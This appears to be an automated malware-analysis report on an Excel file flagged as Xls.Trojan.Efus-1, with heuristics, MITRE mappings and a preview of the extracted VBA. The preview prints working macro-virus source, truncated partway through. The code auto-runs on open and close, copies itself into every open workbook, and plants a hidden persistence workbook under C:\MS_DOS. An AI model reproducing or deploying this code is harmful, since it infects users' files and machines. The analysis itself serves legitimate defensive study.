MALICIOUS
160
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical ClamAV heuristic identified the file as Xls.Trojan.Efus-1. High-severity heuristics indicate the presence of Auto_Open and Auto_Close VBA macros, which are commonly used to execute malicious code upon opening or closing the document. The VBA script attempts to interact with files and macros located in 'C:\MS_DOS\', suggesting an attempt to establish persistence or execute further stages.
Heuristics 4
-
ClamAV: Xls.Trojan.Efus-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Efus-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11500 bytes |
SHA-256: 8b66f2e06aa19856356415eaa69135f2a6414fdb015358aa297765ac20e533de |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "SUFE"
'\
'\Hello!Be sure to make good use of this piece of virus code.Good luck!
'\ -SunUFeiEr
'\
Dim Modu
Dim Infected
Dim Code
Dim puJ
Sub Auto_open()
On Error Resume Next
Application.ScreenUpdating = False
Call Option_Set
Call Settle_C
Application.ScreenUpdating = True
Call Action
End Sub
Sub Auto_close()
On Error Resume Next
Call Action
Call Action_End
End Sub
Sub Option_Set()
On Error Resume Next
With Application
.UserName = "SUFE"
.AltStartupPath = "C:\MS_DOS"
.EnableSound = False
.RollZoom = False
End With
End Sub
Sub Settle_C()
Dim If_Settled As Boolean
On Error Resume Next
With Application.FileSearch
.LookIn = "C:\MS_DOS"
.FileName = "Command.dos"
If .Execute > 0 Then
If_Settled = True
End If
End With
If If_Settled = True Then
Application.MacroOptions Macro:="C:\MS_DOS\Command.DOS!Un_do", Description:="", _
ShortcutKey:="u"
Application.OnWindow = "C:\MS_DOS\Command.DOS!Action"
Call CodeExport
Exit Sub
Else
Call CodeExport
On Error Resume Next
MkDir ("c:\MS_DOS")
Workbooks.Add
Application.ActiveWorkbook.VBProject.VBComponents.Import ("c:\Ms_IO.sys")
ActiveWorkbook.SaveAs FileName:="C:\MS_DOS\Command.DOS", FileFormat:=xlNormal
ActiveWorkbook.Save
ActiveWindow.Visible = False
End If
Application.MacroOptions Macro:="C:\MS_DOS\Command.DOS!Un_do", Description:="", _
ShortcutKey:="u"
Application.OnWindow = "C:\MS_DOS\Command.DOS!Action"
End Sub
Sub Action()
On Error Resume Next
Application.ScreenUpdating = False
For puJ = 1 To Application.Workbooks.Count
If (Application.Workbooks(puJ).FullName <> "C:\MS_DOS\Command.DOS" _
And InStr(Application.Workbooks(puJ).FullName, "\") <> 0) Then
Call CodeImport_Simple
End If
Next puJ
Application.ScreenUpdating = True
Call Punish
End Sub
Sub CodeExport()
Dim i
Dim hFile As Long
On Error Resume Next
i = 0
For Each Modu In Application.VBE.ActiveVBProject.VBComponents
i = i + 1
If (Modu.Name = "SUFE") Then
Code = Application.VBE.ActiveVBProject.VBComponents(i).CodeModule.Lines(1, Application.VBE.ActiveVBProject.VBComponents(i).CodeModule.CountOfLines)
Code = "Attribute VB_Name = ""SUFE""" & Chr(13) & Code
Exit For
End If
Next Modu
hFile = FreeFile
Open "c:\Ms_IO.sys" For Output Access Write As hFile
Print #hFile, Code
Close hFile
End Sub
Sub CodeImport()
On Error Resume Next
Infected = False
For Each Modu In Application.ActiveWorkbook.VBProject.VBComponents
If (Modu.Name = "SUFE") Then
Infected = True
Exit For
End If
Next Modu
If Infected = False Then
Application.ActiveWorkbook.VBProject.VBComponents.Import ("c:\Ms_IO.sys")
Application.ActiveWorkbook.Save
End If
End Sub
Sub CodeImport_Simple()
On Error Resume Next
Infected = False
For Each Modu In Application.Workbooks(puJ).VBProject.VBComponents
If (Modu.Name = "SUFE") Then
Infected = True
Exit For
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.